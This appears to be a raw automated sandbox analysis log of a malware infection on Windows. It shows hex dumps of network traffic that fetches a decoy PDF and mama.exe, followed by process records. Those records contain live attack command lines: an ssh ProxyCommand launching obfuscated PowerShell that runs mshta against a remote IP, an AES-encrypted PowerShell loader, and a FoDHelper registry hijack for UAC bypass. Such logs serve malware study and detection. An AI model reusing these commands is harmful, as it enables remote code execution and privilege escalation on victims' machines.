2024-12-27 08:05:13 UTC | 8000 | IN | Data Raw: 00 00 07 05 00 00 08 ac 00 00 08 a5 00 00 09 21 00 00 08 0d 00 00 08 88 00 00 08 ab 00 00 08 50 00 00 09 24 00 00 08 ca 00 00 09 98 00 00 09 f0 00 00 09 5b 00 00 09 99 00 00 09 1b 00 00 09 7f 00 00 09 5f 00 00 09 3b 00 00 0a 46 00 00 0a 90 00 00 0a 11 00 00 0a 8c 00 00 0a 67 00 00 09 43 00 00 09 51 00 00 09 85 00 00 09 36 00 00 09 51 00 00 09 ad 00 00 10 b5 00 00 0c 66 00 00 0b 1c 00 00 0b 7a 00 00 0a fd 00 00 0a a5 00 00 0a aa 00 00 0a e6 00 00 0a 79 00 00 0a 9e 00 00 0a 43 00 00 0a 73 00 00 0b 03 00 00 0b 93 00 00 0a 9f 00 00 0b 65 00 00 0a ac 00 00 0a 7e 00 00 0a 8b 00 00 0a a2 00 00 0a 74 00 00 0a 2d 00 00 0a 90 00 00 09 94 00 00 09 b1 00 00 11 ff 00 00 09 8d 00 00 09 30 00 00 09 99 00 00 09 35 00 00 09 bd 00 00 09 2e 00 00 09 e0 00 00 0a f1 00 00 0a
Data Ascii: !P$[_;FgCQ6QfzyCse~t-05.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49719 | 150.241.97.10 | 443 | 7432 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 08:05:22 UTC | 79 | OUT | GET /ggg.pdf HTTP/1.1
Host: pravo-bashkortostan.ru
Connection: Keep-Alive
2024-12-27 08:05:23 UTC | 261 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Dec 2024 08:05:23 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Tue, 24 Dec 2024 02:51:24 GMT
ETag: "1491ab-629fb304ac300"
Accept-Ranges: bytes
Content-Length: 1348011
Connection: close
Content-Type: application/pdf
2024-12-27 08:05:23 UTC | 7931 | IN | Data Raw: 25 50 44 46 2d 31 2e 34 0a 25 d3 f4 cc e1 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 28 44 3a 32 30 32 34 30 32 32 32 31 33 30 33 35 33 2b 30 35 27 30 30 27 29 0a 2f 43 72 65 61 74 6f 72 28 50 44 46 73 68 61 72 70 20 31 2e 35 31 2e 35 31 38 35 20 5c 28 77 77 77 2e 70 64 66 73 68 61 72 70 2e 63 6f 6d 5c 29 29 0a 2f 50 72 6f 64 75 63 65 72 28 50 44 46 73 68 61 72 70 20 31 2e 35 31 2e 35 31 38 35 20 5c 28 77 77 77 2e 70 64 66 73 68 61 72 70 2e 63 6f 6d 5c 29 29 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 33 20 30 20 52 0a 2f 4d 65 74 61 64 61 74 61 20 32 33 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 33 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79
Data Ascii: %PDF-1.4%1 0 obj<</CreationDate(D:20240222130353+05'00')/Creator(PDFsharp 1.51.5185 \(www.pdfsharp.com\))/Producer(PDFsharp 1.51.5185 \(www.pdfsharp.com\))>>endobj2 0 obj<</Type/Catalog/Pages 3 0 R/Metadata 23 0 R>>endobj3 0 obj<</Ty
2024-12-27 08:05:23 UTC | 8000 | IN | Data Raw: 79 de 3d 9b 49 7d 9f 27 7c 0e b4 97 10 c6 da b0 48 c8 46 39 53 81 fe cd 00 4b e4 c8 f3 49 6e 26 6f 29 a3 c1 c9 24 93 81 df f1 ac 96 91 20 75 11 12 8c 40 1b 88 e9 eb fd 6b 48 ab 5b 5d ec 5b 91 81 19 26 47 fe 13 d0 ff 00 21 59 e6 1b 66 66 12 4b f3 a1 0f bb 3c 30 cf 26 80 2d c2 63 b4 d5 4b 02 66 6f 2f 27 e5 1c f7 c8 a2 ee f6 39 2e 21 99 c3 2a 49 17 2b 8c e7 0d d2 92 32 93 dd 3c 50 5c 05 0f 18 02 40 a0 71 fe 73 4e bc 10 c5 7d 66 a1 95 a2 45 0b 9e bd c5 00 42 f7 91 6c 0b e4 92 ea 06 e5 23 04 01 9f f1 a6 cd e7 cd 31 8e 38 ca 46 7b 13 ce 40 04 d6 9e ac 63 84 ac ae 36 a3 a9 42 c0 67 19 c6 0d 57 4b a8 a5 9c b3 1f 2f 12 2b 21 61 8d c0 0c 13 f9 50 05 78 6c c2 b7 df 2a f1 0c ab e7 f8 4f 46 c7 f3 a9 6e 25 f2 61 f3 11 11 dc 36 19 3a 83 9e 32 0f a1 a0 5c 23 c2 1a 48 58
Data Ascii: y=I}'|HF9SKIn&o)$ u@kH[][&G!YffK<0&-cKfo/'9.!*I+2<P\@qsN}fEBl#18F{@c6BgWK/+!aPxl*OFn%a6:2\#HX
2024-12-27 08:05:23 UTC | 8000 | IN | Data Raw: b7 dc 35 35 43 6a 7e 43 53 50 03 24 fb f1 ff 00 bd fd 0d 2c 9f ea cf d2 9b 2f df 8b fd ef e8 69 d2 7d c6 fa 50 04 09 fe b1 7f cf 6a b3 55 93 fd 62 ff 00 9e d5 66 80 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 28 c8 a2 80 0a 29 32 33 8c 8c fa 52 d0 01 45 19 a4 56 57 19 56 04 7a 83 40 0b 45 46 27 89 9b 6a c8 85 bd 01 e6 84 b8 85 db 6a 4a 8c de 80 d0 04 94 55 5d 42 76 86 dc f9 72 a4 72 f5 5d e7 ad 54 fe d0 9d 9e 1d e1 2d d0 f2 cc ec 0e e1 ed 40 1a b4 52 2b 06 50 ca 72 0f 20 d2 d0 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 06 66 a1 77 07 da 92 de 79 02 46 b8
Data Ascii: 55Cj~CSP$,/i}PjUbf(((()23REVWVz@EF'jjJU]Bvrr]T-@R+Pr EPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPEPfwyF
2024-12-27 08:05:23 UTC | 8000 | IN | Data Raw: 9f 22 19 44 72 46 dd c0 c5 26 a1 a7 de 5d 5f c7 3a 79 4a 23 c6 32 c7 9c 1c d3 af 34 fb bd 42 44 13 c9 1c 71 27 38 4c 9c d3 b0 17 65 63 75 a7 b3 5b be d3 22 65 58 f6 ac 1b 92 13 4b 8c 05 0d 24 6f 86 95 7a 67 9e 33 de b7 a7 b5 dd a7 b5 b4 2d b3 e4 da a6 b3 4e 95 79 26 9a 2d 9e 68 c6 d3 95 00 7f 33 48 0d 5b 72 64 b4 8c bf 25 90 67 3d f8 ac 9d 05 01 6b c0 54 11 9c 7e 15 ab 6b 1c 91 59 a4 6e 55 9d 57 19 1d 2b 3a ce c2 fe d1 e5 28 f0 9f 30 e4 e7 34 01 1e 82 aa 63 bc ef f3 63 a7 6a 7f 86 c7 ee 67 38 e7 cc c5 2d 8e 9d 7d 66 25 0b 2c 24 48 72 72 0d 58 d2 6c 66 b1 12 89 24 57 0e 73 c0 e9 40 14 b5 26 f2 f5 fb 77 54 2c db 01 da 3a 9e 4d 49 02 5a ea c6 4f 3c 30 99 5f 71 1d 08 1d 00 ab 57 3a 71 9f 51 8a ec 4d b4 c6 00 0b b7 34 92 69 60 ea 1f 6c 86 66 89 b1 c8 03 20 d0
Data Ascii: "DrF&]_:yJ#24BDq'8Lecu["eXK$ozg3-Ny&-h3H[rd%g=kT~kYnUW+:(04ccjg8-}f%,$HrrXlf$Ws@&wT,:MIZO<0_qW:qQM4i`lf
2024-12-27 08:05:23 UTC | 8000 | IN | Data Raw: 92 26 85 e5 b7 76 dc 8c 83 24 7b 1a b3 6d 03 cb 7e d7 d2 a1 4f 97 64 68 7a e3 d4 d0 05 2b 4b 28 64 d6 2f 63 61 fb b5 da 42 0e 9d 29 e9 02 e9 fa e4 6b 08 db 14 ea 72 be 84 50 b3 3c 1a d5 d9 48 5a 50 54 6e 0b d7 a5 58 b7 8e 6b ab f1 77 3c 46 24 45 db 1a 37 5e 7a 93 40 11 e9 0d f6 89 6e ae 24 e5 fc cd a3 3d 87 a5 46 c3 ec da f4 42 3f 95 66 07 70 15 20 86 e3 4f bb 9a 48 63 f3 a0 94 e4 aa 9e 54 d2 c1 14 97 1a 82 dd 4c 9e 5e c1 85 42 79 fc 68 02 cd e2 ab 4d 6a 0a 82 de 6f 1f 91 a8 5d 40 d7 a2 38 e4 c2 69 91 5c cd 77 71 f6 88 ad 59 a2 8f 2a 99 60 32 7b 9a 6d c1 b9 4b f8 ef 1e dc f9 71 a9 56 0a c0 9f ad 00 6b 51 48 08 20 11 d0 d4 77 42 63 6e e2 d8 81 2e 3e 52 68 03 1a e1 26 d3 af dd 6d d4 98 ee c6 14 7f 75 ab 6a de 21 0c 09 10 e8 a3 15 4e d2 0b b9 64 8e 6b f2 bb
Data Ascii: &v${m~Odhz+K(d/caB)krP<HZPTnXkw<F$E7^z@n$=FB?fp OHcTL^ByhMjo]@8i\wqY*`2{mKqVkQH wBcn.>Rh&muj!Ndk
2024-12-27 08:05:23 UTC | 8000 | IN | Data Raw: 03 e5 a8 f4 29 24 68 e6 53 16 d4 f3 58 ee dd df d3 15 ab 50 5b da c7 6e 8e 91 e7 0e c5 8e 4f 73 40 11 ea 16 90 dd 40 4c a4 82 a0 90 c0 f4 a3 4b 67 7d 3a 13 21 c9 c7 5f 51 4c 4d 2a dd 46 37 4a c9 9c ec 2e 71 57 40 0a 00 03 00 70 05 00 2d 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05
                                                                      Data Ascii: )$hSXP[nOs@@LKg}:!_QLM*F7J.qW@p-Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: 28 a2 8a 00 28 a2 8a 00 29 1b a7 e3 4b 48 dd 3f 11 40 0b 45 54 d4 e5 9a 1b 37 96 06 0a 50 64 e4 66 a6 b6 73 25 b4 4e c7 25 94 13 f9 50 04 b4 54 53 5c 47 0b c6 8c 7e 69 1b 6a 8a 24 b8 48 e5 8e 26 3f 34 87 00 50 04 b5 5a f2 c9 2f 15 56 47 70 14 e4 05 3d ea ce 45 20 60 dd 08 3f 43 40 09 1a ec 40 bb 8b 63 b9 eb 4e a4 0c 09 20 10 48 ea 2a b4 ee cf 7d 04 2a 48 03 32 36 0f 6e 80 50 05 aa 86 eb fd 49 a8 6e 37 4d 78 90 24 8c 81 14 bb 15 f7 e0 7f 5a a9 63 2b 1d 3e 63 2c 85 f6 ca 46 e6 34 01 7e cf ee 1a b1 55 2c a5 43 0b 1d c0 01 d4 e7 a5 4d 1d cc 12 b6 d8 e5 46 6f 40 68 01 65 fb f1 7f bf fd 0d 2c bf ea db e9 59 f3 a9 4d 6e 12 19 88 75 24 82 78 14 fb 84 81 f5 05 7f b4 62 55 42 3c b0 68 02 54 51 e7 23 01 ce 07 35 6e b3 fe d3 12 30 2d 22 80 a3 9e 7a 55 b8 6e 61 9e 33
                                                                      Data Ascii: (()KH?@ET7Pdfs%N%PTS\G~ij$H&?4PZ/VGp=E `?C@@cN H*}*H26nPIn7Mx$Zc+>c,F4~U,CMFo@he,YMnu$xbUB<hTQ#5n0-"zUna3
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: 0a 28 a2 80 0a 28 a2 80 0a 28 a3 bd 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 07 a5 44 bf eb 4d 4b 51 0f f5 c6 80 25 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2 8a 28 00 a2
                                                                      Data Ascii: (((QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEDMKQ%((((((((((
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: b2 9e 40 a0 0a 77 e7 ec 90 c5 22 ce e6 e0 10 58 17 cf 6f 4a d3 b8 5f 3a cf 25 99 7e 50 df 29 c5 63 6a 13 59 1d 39 52 d5 83 1c e5 b8 e7 a7 73 57 86 a7 69 f6 54 8b cd f9 99 30 3e 53 c9 c5 00 56 bc 56 8a d0 c8 92 3e e2 33 9c f4 ab 57 70 ed d2 0b ac 92 07 54 dc 1b 79 ce 6a be a7 84 d3 f0 48 ce d1 56 27 b8 85 b4 36 6f 31 48 31 60 73 df 1d 28 02 23 b2 3d 15 59 9e 46 92 44 dc 30 e7 25 b1 fc aa 4d 2e 04 9b 4b 06 42 ec 64 1f 31 2c 73 50 e9 fe 57 f6 53 4f 2c 81 d9 62 29 fe e0 c7 4a 9b 44 9e 3f ec b5 05 c0 f2 f3 bb 3d a8 02 b6 92 f6 c9 14 c2 e2 61 bf 71 4f 9d ff 00 86 9f a4 c7 0b df dd 32 1d ea 8d f2 1c e4 01 46 8a 60 7f b4 2b 28 2d e6 16 19 5f e1 a5 d3 65 8d 75 5b b5 50 55 5c fc bc 60 1a 03 51 22 b7 86 3d 7e 45 da 02 08 b7 e0 f4 07 3d 6a 19 04 57 1a dc 24 45 88 9f
                                                                      Data Ascii: @w"XoJ_:%~P)cjY9RsWiT0>SVV>3WpTyjHV'6o1H1`s(#=YFD0%M.KBd1,sPWSO,b)JD?=aqO2F`+(-_eu[PU\`Q"=~E=jW$E
                                                                      2024-12-27 08:05:23 UTC8000INData Raw: 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 53 64 fb a3 ea 29 d4 d9 3e ef e2 28 01 d4 51 45 00 14 51 45 00 14 51 45 00 14 51 45 00 15 52 6b eb 5f 2d 87 da 23 cf a6 ea b7 58 9a 84 6a 35 a8 70 a3 e6 4e 78 fa d0 05 9b 1b cb 74 46 0f 2a a9 27 8c 9a b4 97 d6 b2 38 44 99 59 89 c0 02 a1 d3 51 7c b7 f9 47 5f 4a af a2 85 59 ef 30 00 c4 87 fa d0 06 84 ff 00 eb 21 ff 00 7f fa 1a 7c df ea 5f e8 6a 9d c5 fd b7 9f 1a 89 94 94 6c b6 3a 0e 29 cb a8 5b 5d 24 89 0c 99 60 a7 8c 62 80 1d ff 00 2d 22 fc 3f 95 5b ac d6 bc 88 48 9c b7 cb 8c 8d a6 a7 9f 52 b7 b7 90 24 85 c3 1e 83 61 e6 80 2d d1 50 4d 77 1c 36 e2 77 57 d8 7d 17 91 f5 aa f2 6a d0 c6 01 78 a6 55 27 00 94 eb 40 17 e8 a8 1a ea 34 b5 fb 44 81 91 71 d1 87 35 58 ea 82 3d ad
                                                                      Data Ascii: QEQEQEQEQEQEQESd)>(QEQEQEQERk_-#Xj5pNxtF*'8DYQ|G_JY0!|_jl:)[]$`b-"?[HR$a-PMw6wW}jxU'@4Dq5X=


                                                                      Session ID:2
                                                                      Source IP:192.168.2.7
                                                                      Source Port:49731
                                                                      Destination IP:150.241.97.10
                                                                      Destination Port:443
                                                                      PID:7432
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Timestamp / Bytes transferred / Direction / Data
                                                                      2024-12-27 08:05:27 UTC / 56 / OUT / GET /mama.exe HTTP/1.1
                                                                      Host: pravo-bashkortostan.ru
                                                                      2024-12-27 08:05:28 UTC / 273 / IN / HTTP/1.1 200 OK
                                                                      Date: Fri, 27 Dec 2024 08:05:27 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      Last-Modified: Mon, 23 Dec 2024 10:31:56 GMT
                                                                      ETag: "414400-629ed81723f00"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 4277248
                                                                      Connection: close
                                                                      Content-Type: application/x-msdos-program


                                                                      Target ID:1
                                                                      Start time:03:05:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" .
                                                                      Imagebase:0x7ff7c9110000
                                                                      File size:946'176 bytes
                                                                      MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:03:05:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:03:05:05
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)
                                                                      Imagebase:0x7ff741d30000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:8
                                                                      Start time:03:05:06
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://150.241.97.10/aaa.mp4"
                                                                      Imagebase:0x7ff741d30000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:9
                                                                      Start time:03:05:08
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\mshta.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\mshta.exe" https://150.241.97.10/aaa.mp4
                                                                      Imagebase:0x7ff7f9390000
                                                                      File size:14'848 bytes
                                                                      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:14
                                                                      Start time:03:05:09
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff7b4ee0000
                                                                      File size:55'320 bytes
                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:16
                                                                      Start time:03:05:13
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function KYLfE($jfvKN){return -split ($jfvKN -replace '..', '0x$& ')};$ggUL = KYLfE('653ADB09197706BFF248B833EA1F27F5D58878713451BA8F31B442364AD50B177565132C81A8CE0C04335FB368B1BEC213971455480775829F6BC6C5534155F957E2CFA508A5FE4C311E066403190FB60B4C1CBCAA36CDF33D5F614FD5F67A8C2528EBC6C4B5B8A0BCE76A43045B19C3EFD6F5EF3BA1ECB5686BD73B304C0491078B179DA1CA0AE1F3DA25490E7B58EE2FF863E346260ADACB21649FF36146554F42D087971F82489AB30989E3F0674F581C0CF80616E540BCAA41B0428AFCE3F21FEDF2F8472F6163E56EE7F1258524A03F60DB1043BAA3A075884983F2CF092375522F8988E476AF72DC3C2FC7ADC9FE0507992C92239AEC2429066EBBD2B17CD0CF69B5F864C012338D6D8DD368382C5160478C96E06E3861DF4B0A736F2572D32B9090B656B519C9EE189C51F0156B1592FEE6EA266869208339B1F4A4CD0C9D18D67D96F8EDEABC3C915510C81009138CDC34ED0E78C7B482DF473E7EB8A0B3B274003F057FF8E56D8EE713118A6B7733A69E09E35C4F1734DC2CD1DE6AC8BAF5167083E43F074961524961B7179D937805AC28E554A85FFB0FCE8FFC6971BD36500B19554E2CF2C414FD3F7D20F637C3FED2CBE4F16D815833AF6587C0445B171F727757FCB88407DA064E176D7AC09BE6F81860913C206895922FA10CFC3D057E32F3236CB84F7AE4D8C4681039F91AD409D0EE7A284E00484796BDFD0C577C1033FC2B929938AE4EBE01CA086A4EF8DF874CDFA55DE6194B2ADD9FBBDE3B65169B4CE6FC4C5D063449D421C5DF87AEB418D87EB94D8085A780CFF969515BFBEB7CDAA25C3E5DDF20FBB0A604B6DDAADCF97B9534A77F8A73360422DF52B6736926BFB5D66CED1F6F797F1B6D9ADE5E074859D887E8C3BAD2D33A412611BA85A6107B8F004E605620D5E3F4FBA15B1FF642AB09A70A27BFE4F97180E1A5489A15A3E5F7DB53356E7F7869F6731F3815B6F7E852698335FA8BAB0A12F68F66EE399CA6B7D1994FCED4BFB476066214D61A279B592BEDE9BC4173840D28016672E7995C751B825A18AD0960AFBBBA9071CC631FAD152EBE5D6DA49DB75B7BD20456369CDA6719ECA0462C83310F3F5AC28103792DEEACDFA6A31D127726B84A5A8E39A884DF8FECDA2CDEC9DC279C956D253761973C9EA36666F0C5DD4C4F3306483BF6811C7ED4F0265F0E66FF777C5BB9A9B4324C54769C9B5D706B4EC485997D1ADB50FD71
564B9401E52E3A3F5CBBCCB76BED1B5CF3AF43B7E7C4C42DEA2A7F2E21992968FAA86787095556C265ABB0DB1B02F1C5C06E0B96EB6B38F98AA3878E78E92A9D5FBA55B149C8DD782681A530F1C11D94505305C1EE8EF1F25970104E28DFF99776F3628512C465DC2125A38927E4CFD827415D33DC2DE13D550C5CD8ABCD58EFF5EF4B7CDFE93710EB277C3304084BD9201E5DABDEBE54FAEF993C8A690421AB366C5CF613F7CAC0628AAD89849B65FFF1054CB508E8D107D332DE6E06598C86C6E7B2AA72A92B5D11793DA067088A83ABF915B5B690EF77973FDD05902457333BF3D9982DDC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDCD2A250E1B94DF3BE5873BF3A7890D5E7B8654695D20530BC9EF65B371EDFBA73316E25945A063D7A28BE0F4070D89BD71D08F1EC1392620E3F9E825A74316A5E9B8A7A70C3FC14D385B0D9F2A32F105EC66DC0B66EF10CB54D88BC0C2EC3C6D8B685C4A14BBFAF410E05F6F6457D7F9DA84102A348A56A4485CC1461217FCCC817704BD60EAE9427F8F126249479DA465DD0953880B50203DFB5DF97FEC094E492A4B417CF22BF841934ED24A0B0560EBF6DC9556D5FFD9549F51C870531BFA2BCFA700AD9EF423262F03922066B86DB35AA36FA7B763DCDD7176D82F2B7AF30B64970FA776C81DE60217D00F4B33DE2484A7526D3027184AB3318A44AC8E56A23A1E7AE21C561807980C57498B0BF9EF2CB743BB88450F5E4C7BFD72EF1467CDC3C67606AB945368DED820465416BA2A5775E52744944EAC6DA3F107DC69F469ACC6AF28A5520C7CF8FF549A145DC7A79D1CA66B1BB307B8BFE97041FB1F1CD07CA9DF7DDFD418D990B4FFF0ECB1DBDCFB5AE09034756A206FCED160FB71D4F142B6F97A20C8E1DF317F55051E54E9076BE72CCAA9E3538A276B4BA3BE1FA5C23EF88B84FED88D1E3F4D6ACF1A58A49CB7C35A80F797F9F1E55D3A01B4D42B956350FAF932B55519B6F7E70D2A0C998AA611AED9BEA8A07706D8B5704FC697F2C676DC5C4C1093
EFEF23707B4BD489239CB80D30338E');$PYGob=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((KYLfE('4344494372736B6F7955464B61484843')),[byte[]]::new(16)).TransformFinalBlock($ggUL,0,$ggUL.Length)); & $PYGob.Substring(0,3) $PYGob.Substring(283)
                                                                      Imagebase:0x7ff741d30000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:17
                                                                      Start time:03:05:13
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff75da10000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:18
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "%TMP%\r.bat" /F && REG ADD HKEY_CURRENT_USER\Software\Classes\MS-Settings\CurVer /VE /T REG_SZ /D "ServiceHostXGRT" /F && FoDHelper.exe"
                                                                      Imagebase:0x7ff6b3b70000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:19
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:REG ADD HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT\Shell\Open\Command /VE /T REG_SZ /D "C:\Users\user~1\AppData\Local\Temp\r.bat" /F
                                                                      Imagebase:0x7ff70a3c0000
                                                                      File size:77'312 bytes
                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Target ID:20
                                                                      Start time:03:05:16
                                                                      Start date:27/12/2024
                                                                      Path:C:\Windows\System32\reg.exe
                                                                      Wow64 process (32bit):false
